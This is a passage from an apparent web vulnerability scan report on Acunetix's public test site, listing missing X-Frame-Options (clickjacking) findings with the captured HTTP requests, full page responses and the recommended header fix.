                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="36F90C25" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWgK42oW1DwLStq24BwK3jsrkBALF97vxAQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8wYbzXe+sXxDpSfVp4SwbIP85RvA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          						<TABLE id="Table2" cellSpacing="0" cellPadding="10" width="300" border="0" class="FramedForm"
          							align="center">
          							<TR>
          								<TD>Username:</TD>
          								<TD>
          									<input name="tbUsername" type="text" id="tbUsername" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD>Password:</TD>
          								<TD>
          									<input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD></TD>
          								<TD align="right">
          									<input type="submit" name="btnSignup" value="Sign me up" id="btnSignup" /></TD>
          							</TR>
          						</TABLE>
          						<BR>
          						
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY. Alternatively, consider implementing Content Security Policy's "frame-ancestors" directive.

        17. POST http://testaspnet.vulnweb.com/about.aspx
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (397 bytes)
          POST http://testaspnet.vulnweb.com/about.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/about.aspx
          Content-Length: 1027
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1027 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t&__VIEWSTATEGENERATOR=E809BCA5&__EVENTVALIDATION=%2FwEWVwKqq9H0CQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2F2grLtTL%2BjO092JULZB%2B%2Bks9UGJw%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 14467
          
          
          Response body (14467 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>About</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="about.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKqq9H0CQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/2grLtTL+jO092JULZB++ks9UGJw==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          						<h1>About this website</h1>
          						<p>The website was built with the intention to test the Acunetix Web Vulnerability 
          							Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate 
          							the forementioned software's capabilities to find those bugs.</p>
          						<p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive 
          								information on this site. This includes e-mail addresses or real names.</b></p>
          						<h1>About Acunetix</h1>
          						<P><B>Combating the web vulnerability threat<BR>
          							</B>Securing a company's web applications is today's most overlooked aspect of 
          							securing the enterprise. Web application hacking is on the rise with as many as 
          							75% of cyber attacks done at web application level or via the web. Most 
          							corporations have secured their data at the network level, but have overlooked 
          							the crucial step of checking whether their web applications are vulnerable to 
          							attack. Web applications, which often have a direct line into the company's 
          							most valuable data assets, are online 24/7, completely unprotected by a 
          							firewall and therefore easy prey for attackers.</P>
          						<P>Acunetix was founded with this threat in mind. We realised the only way to 
          							combat web site hacking was to develop an automated tool that could help 
          							companies scan their web applications for vulnerabilities. In July 2005, 
          							Acunetix Web Vulnerability Scanner was released - a tool that crawls the 
          							website for vulnerabilities to SQL injection, cross site scripting and other 
          							web attacks before hackers do.</P>
          						<P>The Acunetix development team consists of highly experienced security developers 
          							who have each spent years developing network security scanning software prior 
          							to starting development on Acunetix WVS. The management team is backed by years 
          							of experience marketing and selling security software.</P>
          						<P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/">
          								offices</A> in Malta, US and the UK.
          						</P>
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY. Alternatively, consider implementing Content Security Policy's "frame-ancestors" directive.

        18. POST http://testaspnet.vulnweb.com/default.aspx
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (388 bytes)
          POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com
          Content-Length: 1025
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1025 bytes)
